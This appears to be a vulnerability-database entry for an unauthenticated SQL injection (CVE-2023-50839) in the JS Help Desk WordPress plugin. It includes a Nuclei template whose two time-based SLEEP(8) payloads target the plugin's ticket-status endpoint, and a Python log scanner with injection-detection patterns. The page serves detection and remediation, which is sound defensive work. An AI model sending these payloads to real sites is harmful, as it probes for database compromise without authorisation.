
JS Help Desk <= 2.8.1 - SQL Injection

CVE-2023-50839
Verified

Description

The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the 'email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.8

Exploit Probability

16%

Published Date

February 20, 2026

Template Author

shivam kamboj

CVE-2023-50839.yaml
id: CVE-2023-50839

info:
  name: JS Help Desk <= 2.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the 'email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of JS Help Desk, version 2.8.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50839
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50839
    epss-score: 0.16327
    epss-percentile: 0.94941
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,js-support-ticket,unauth

flow: http(1) || http(2)

http:
  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test@test.com' AND SLEEP(8)-- -&ticketid=test123

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and

  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test@test.com&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a0047304502210090fd980342515f6e5d21503ee023403100c22d62bacb6c4486d9f3361c419f1d022023d8aca8534fa74c65beb61edb78a8620815cc7920c09223dde3e93922474db9:922c64590222798bb761d5b6d8e72950
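The template above detects the flaw from the outside by timing: it injects SLEEP(8) into the 'email' or 'ticketid' parameter of a POST to /js-support-ticket-controlpanel/ and matches when the 302 response with an empty body takes at least 8 seconds. The same two signals, a time-delay payload in those parameters and an abnormally slow response from that endpoint, are what a defender would look for in request logs. The following Python script is an added example and is not part of the template or the plugin; it assumes a constructed, tab-separated audit log (timestamp, method, path, status, response seconds, form body) such as a WAF or reverse proxy might record, which is an assumption, since ordinary access logs do not capture POST bodies. It watches 'email', 'ticketid' (the template's name) and 'trackingid' (the advisory's name), and grades each hit by whether the payload evidence and the delay both appear.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Endpoint and parameters named on this page: the Nuclei template posts to this
# path with 'email' and 'ticketid'; the advisory text names 'trackingid'.
TARGET_PATH = "/js-support-ticket-controlpanel/"
WATCHED_PARAMS = ("email", "ticketid", "trackingid")
# The template's matcher treats a response taking >= 8 s as evidence of SLEEP(8).
SLOW_THRESHOLD = 8.0

# Signatures of a time-based blind injection inside a quoted string literal.
SQLI_PATTERNS = {
    "quote followed by boolean operator": re.compile(r"'\s*(and|or)\b", re.I),
    "time-delay function": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "SQL line comment terminator": re.compile(r"--\s"),
}

# Constructed sample log (assumption: a WAF/reverse-proxy audit log recording
# tab-separated timestamp, method, path, status, response seconds, form body).
# Records 2 and 3 carry the template's two payloads; record 5 is merely slow.
SAMPLE_LOG = """\
2026-02-20T10:00:01Z\tPOST\t/js-support-ticket-controlpanel/\t302\t0.21\tform_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=alice%40example.com&ticketid=4711
2026-02-20T10:00:05Z\tPOST\t/js-support-ticket-controlpanel/\t302\t8.43\tform_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test%40test.com%27+AND+SLEEP%288%29--+-&ticketid=test123
2026-02-20T10:00:20Z\tPOST\t/js-support-ticket-controlpanel/\t302\t8.11\tform_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test%40test.com&ticketid=1%27+AND+%28SELECT+1+FROM+%28SELECT+SLEEP%288%29%29x%29--+-
2026-02-20T10:01:00Z\tGET\t/\t200\t0.05\t
2026-02-20T10:02:00Z\tPOST\t/js-support-ticket-controlpanel/\t302\t9.02\tform_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=bob%40example.com&ticketid=99
"""


@dataclass
class Request:
    ts: str
    method: str
    path: str
    status: int
    duration: float
    params: dict  # form parameter -> first decoded value


@dataclass
class Finding:
    ts: str
    confidence: str  # "high", "medium" or "low"
    reasons: list = field(default_factory=list)


def parse_record(line):
    """Split one log line into a Request; the form body is URL-decoded."""
    ts, method, path, status, duration, body = line.split("\t", 5)
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return Request(ts, method, path, int(status), float(duration), params)


def analyze(req):
    """Return a Finding for a suspicious request to the ticket-status endpoint, else None."""
    if req.method != "POST" or req.path != TARGET_PATH:
        return None
    reasons = []
    for name in WATCHED_PARAMS:
        value = req.params.get(name, "")
        for label, pat in SQLI_PATTERNS.items():
            if pat.search(value):
                reasons.append(f"{name}: {label}")
    payload_hit = bool(reasons)
    slow = req.duration >= SLOW_THRESHOLD
    if slow:
        reasons.append(f"response took {req.duration:.2f}s (>= {SLOW_THRESHOLD}s), status {req.status}")
    if not reasons:
        return None
    # Payload plus the delay it asks for is a confident hit. Payload alone means
    # the query may have failed or been blocked. Delay alone could be ordinary
    # backend slowness, so it is reported at low confidence for triage.
    if payload_hit and slow:
        confidence = "high"
    elif payload_hit:
        confidence = "medium"
    else:
        confidence = "low"
    return Finding(req.ts, confidence, reasons)


def scan(log_text):
    """Run analyze() over every non-empty line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = analyze(parse_record(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.ts, f.confidence, "; ".join(f.reasons))
```

Run against the constructed sample, the script reports the two payload-carrying requests at high confidence and the slow-but-clean request at low confidence; the fast, clean request and the unrelated GET produce nothing. The latency rule alone is deliberately kept because an attacker can obfuscate the payload beyond these three patterns, while the delay the injection depends on is hard to hide.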
Score: 9.8

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2023-50839
CWE ID: CWE-89

References

https://nvd.nist.gov/vuln/detail/CVE-2023-50839
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid

Remediation Steps

Update to the latest version of JS Help Desk, version 2.8.2 or later.